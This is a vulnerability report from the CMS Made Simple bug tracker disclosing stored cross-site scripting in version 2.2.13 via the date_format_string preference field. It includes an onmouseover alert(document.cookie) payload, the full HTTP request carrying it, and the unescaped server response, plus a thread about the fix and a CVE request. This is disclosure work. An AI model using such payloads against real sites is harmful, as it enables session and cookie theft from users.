CMS MADE SIMPLE FORGE

CMS Made Simple Core

 
Back Back to List

[#12227] Stored Cross-Site Scripting - CMS Made Simple 2.2.13

avatar
Created By: Guram Javakhishvili (guramjava)
Date Submitted: Sun Dec 22 18:05:03 -0500 2019

Assigned To:
Version: 2.2.13
CMSMS Version: 2.2.13
Severity: Minor
Resolution: Fixed
State: Closed
Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.13
Detailed Description:
Stored Cross-Site Scripting - CMS Made Simple 2.2.13

# Summary:

• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Stored 
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com
• Software : CMS Made Simple 2.2.13 
• Product Version: 2.2.13
• Vulnerability Type : Injection
• Vulnerability : Cross Site Scripting (XSS) Stored

# Description:

CMS Made Simple version 2.2.13  suffer from reflective and persistent (Stored)
cross site scripting and html injection vulnerabilities.
Insufficient validation of user input on the authenticated part of the CMS Made
Simple web application exposes the application to persistent cross site
scripting (XSS) vulnerabilities.
These vulnerabilities enable potentially dangerous input from the user to be
accepted by the application and then embedded back in the HTML response of the
page returned by the web server.
When the User/User's Preferences being viewed, e.g. by an administrative
user, the
   JavaScript code will be executed in the browser. 


# Steps to Reproduce:

The attacker needs the appropriate permissions but non-Admin (can be Editor or
Designer user roles) in order to create News, Content, Directory, Shortcuts,
etc.
It was noted that the data format string field was found to be vulnerable to a
Stored Cross Site Scripting (XSS) vulnerability.
Login as editor > click on 'My Account' > click on 'User Preferences' >  insert
XSS payload into the 'Data Format String' field and click submit. Now hover over
the field and XSS payload will rendering in the browser.

List of vulnerable parameter:
	• date_format_string

Attack vector:
<html><input><img/src=""onmouseover=alert(document.cookie)>"onmouseover=alert(document.cookie);//</input></html><input>HTML5</input>//


# HTTP Request

POST /cmsms-2.2.13/admin/myaccount.php?__c=233d48d93b73772c983 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101
Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Content-Length: 469
Origin: http://localhost
Connection: close
Cookie:
6a048a268372a94a595fdec4fbda4134aa83a6e6=e5d7ffe9b2883f3ee16cbcab8b30cb7300acc36d%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiZ3VyYW1qIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJFdaNzlUc1JiOTI2c2pLbmlndmFlcS5QdGVjRTdFdmg1S0FlNnFQNlBMbXJqSFdIQW92Lk5tIn0%3D;
__c=233d48d93b73772c983; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc;
CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1

active_tab=advtab&edituserprefs=true&old_default_cms_lang=&default_cms_language=&date_format_string=%3Chtml%3E%3Cinput%3E%3Cimg%2Fsrc%3D%22%22onmouseover%3Dalert%28document.cookie%29%3E%22onmouseover%3Dalert%28document.cookie%29%3B%2F%2F%3C%2Finput%3E%3C%2Fhtml%3E%3Cinput%3EHTML5%3C%2Finput%3E%2F%2F&wysiwyg=MicroTiny&syntaxhighlighter=-1&ce_navdisplay=&parent_id=-2&indent=on&admintheme=OneEleven&homepage=&edituserprefs=true&old_default_cms_lang=&submit_prefs=Submit







# Snip of HTTP Server response (output not encoded):


src="http://localhost/cmsms-2.2.13/admin/themes/OneEleven/images/icons/system/info.gif"
alt="Date Format String" /></span></p>
	<p class="pageinput">
<input class="pagenb" size="20" maxlength="255" type="text"
name="date_format_string" value=""onmouseover=alert(document.cookie);//HTML5//"
/>
<em>strftime</em> formatted date format string. Try googling 'strftime' for
more information
	</p>
      </div>
    </fieldset>

    <fieldset>


History

Comments
avatar 
Date: 2020-03-01 05:47
Posted By: Guram Javakhishvili (guramjava)

Hi,

Is there any update on this?
avatar 
Date: 2020-03-01 14:02
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
avatar 
Date: 2020-03-08 15:17
Posted By: Guram Javakhishvili (guramjava)

Hi, Is there any update on the above and could you please assign CVE to this
vulnerability? Thanks.
avatar 
Date: 2020-03-18 11:13
Posted By: Rolf (rolf1)

fixed for 2.2.14
avatar 
Date: 2020-03-21 14:06
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
avatar 
Date: 2020-03-30 13:11
Posted By: Rolf (rolf1)

CMS Made Simple 2.2.14 is released
avatar 
Date: 2020-05-03 15:59
Posted By: Guram Javakhishvili (guramjava)

Hello,

Is there any update on this? I have been asking for an update since my
submission of the above vulnerability. It is by now over five month since this
vulnerability has been reported to you by myself.
And I would like to ask you if you would let me go public by next week? 
Could you please mark this as PUBLIC?
I also wish to request a CVE number for this vulnerability if that is ok?

If you have any questions please let you know.

Regards,
Guram
Updates

Updated: 2020-03-30 13:11
state: Open => Closed

Updated: 2020-03-18 11:07
resolution_id: 5 => 7
severity_id: 1 => 3
assigned_to_id: 106 => 100

Updated: 2020-03-08 15:17
resolution_id: => 5
assigned_to_id: 13536 => 106